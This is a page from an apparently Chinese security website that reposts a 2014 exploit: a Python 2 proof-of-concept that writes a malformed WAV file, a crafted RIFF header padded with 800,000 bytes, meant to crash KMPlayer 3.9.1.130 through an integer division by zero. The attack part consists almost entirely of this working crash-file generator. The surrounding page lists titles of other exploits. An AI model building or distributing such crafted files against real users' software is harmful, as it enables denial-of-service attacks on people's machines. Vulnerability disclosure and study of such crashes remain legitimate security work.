首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
KMPlayer 3.9.1.130 Denial Of Service
来源:http://opensecurity.in 作者:Abraham 发布时间:2014-11-26  
# Exploit Title: KMPlayer 3.9.1.130 Integer division by zero DoS.
# Date: 25-11-2014
# Author: Ajin Abraham
# Website: http://opensecurity.in
# Vendor Homepage: http://www.kmpmedia.net/
# Software Link: http://filehippo.com/download_kmplayer/download/7f497da5a4cda4032bf7e4a11c9e3131/
# Version: 3.9.1.130
# Tested on: Windows 7,8, 8.1

header = ("\x52\x49\x46\x46\x64\x31\x10\x00\x57\x41\x56\x45\x66\x6d\x74\x20"
"\x10\x00\x00\x00\x01\x00\x01\x00\x22\x56\x00\x00\x10\xb1\x02\x00"
"\x04\x00\x00\x00\x64\x61\x74\x61\x40\x31\x10\x00\x14\x00\x2a\x00"
"\x1a\x00\x30\x00\x26\x00\x39\x00\x35\x00\x3c\x00\x4a\x00\x3a\x00"
"\x5a\x00\x2f\x00\x67\x00\x0a")
exploit = header
exploit += "\x41" * 800000
 
try:
    print "[+] Creating POC"
    crash = open('fuzz.wav','w');
    crash.write(exploit);
    crash.close();
except:
    print "[-] No Permissions.."

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·PHP 5.x / Bash Shellshock Proo
·Mozilla Firefox 3.6 mChannel U
·Pandora FMS SQLi Remote Code E
·All-in-One WP Migration 2.0.2
·Mini-stream RM-MP3 Converter 3
·Linux Kernel libfutex Local Ro
·Elipse E3 HTTP Denial of Servi
·Arris VAP2500 Authentication B
·Android WAPPushManager - SQL I
·phpMyRecipes 1.2.2 (dosearch.p
·Device42 WAN Emulator 2.3 Trac
·TRENDnet SecurView Wireless Ne
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved